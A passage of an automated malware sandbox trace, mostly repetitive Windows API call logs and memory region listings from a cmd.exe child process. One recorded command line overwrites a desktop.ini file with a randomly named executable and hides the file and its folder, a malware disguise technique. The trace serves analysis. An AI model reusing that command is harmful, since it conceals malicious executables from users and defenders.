lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] GetFileType (hFile=0x4c) returned 0x1 [0193.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.885] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.886] GetFileType (hFile=0x4c) returned 0x1 [0193.886] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.886] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.886] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.886] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.913] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] GetFileType (hFile=0x4c) returned 0x1 [0193.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.913] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.914] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] GetFileType (hFile=0x4c) returned 0x1 [0193.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.914] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.915] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.915] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.916] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.916] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] GetFileType (hFile=0x4c) returned 0x1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.916] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.917] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.917] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x200, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee90*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12eee0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef30*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] GetFileType (hFile=0x4c) returned 0x1 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.917] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ef80*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] WriteFile (in: hFile=0x4c, lpBuffer=0x12efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12efd0*, lpNumberOfBytesWritten=0x12e024*=0x50, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] WriteFile (in: hFile=0x4c, lpBuffer=0x12f020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12f020*, lpNumberOfBytesWritten=0x12e024*=0x20, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.918] ReadFile (in: hFile=0x54, lpBuffer=0x12ee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e030, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesRead=0x12e030*=0x32, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] GetFileType (hFile=0x4c) returned 0x1 [0193.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0193.918] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee40*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12e024, lpOverlapped=0x0 | out: lpBuffer=0x12ee40*, lpNumberOfBytesWritten=0x12e024*=0x32, lpOverlapped=0x0) returned 1 [0193.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0193.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e010 | out: lpNewFilePointer=0x0) returned 1 [0193.918] _close (_FileHandle=4) returned 0 [0193.918] FindNextFileW (in: hFindFile=0x1f0e58, lpFindFileData=0x12f0a4 | out: lpFindFileData=0x12f0a4) returned 0 [0193.919] GetLastError () returned 0x12 [0193.919] FindClose (in: hFindFile=0x1f0e58 | out: hFindFile=0x1f0e58) returned 1 [0193.919] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0193.919] _close (_FileHandle=3) returned 0 [0193.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.920] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.920] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.920] SetConsoleInputExeNameW () returned 0x1 [0193.920] GetConsoleOutputCP () returned 0x1b5 [0193.920] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.920] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.920] exit (_Code=0) Process: id = "444" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28543 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28544 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28545 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28546 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 28547 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28548 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28549 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28550 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28551 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 28552 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28601 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28602 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28603 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28604 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 28605 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 28606 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 